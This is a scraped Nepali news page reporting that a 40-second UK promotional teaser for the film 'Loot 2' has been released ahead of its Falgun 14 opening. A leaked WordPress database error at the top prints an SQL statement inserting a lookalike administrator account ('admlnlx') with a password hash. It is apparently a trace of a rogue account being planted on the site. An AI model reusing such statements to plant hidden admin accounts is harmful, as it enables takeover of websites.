WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM07c3chXuZV6etjvu3BUHclkl9YXx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:43:38', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेपाली कथानक चलचित्र ‘लुट–२’ को यूके प्रोमोशन टिजर सार्वजनिक भएको छ । बुधबार सार्वजनिक गरिएको टिजर ४० सेकेन्ड लामो छ ।
राजु मगर, कृष्ण गुरुङ, मनोहर सुनुवार र किरण राईले तयार पारेको टिजरको निर्देशन तथा सम्पादन राजदिप राइले गरेका हुन् ।
चलचित्र ‘लुट–२’ फागुन १४ गते प्रदर्शनमा आउँदैछ ।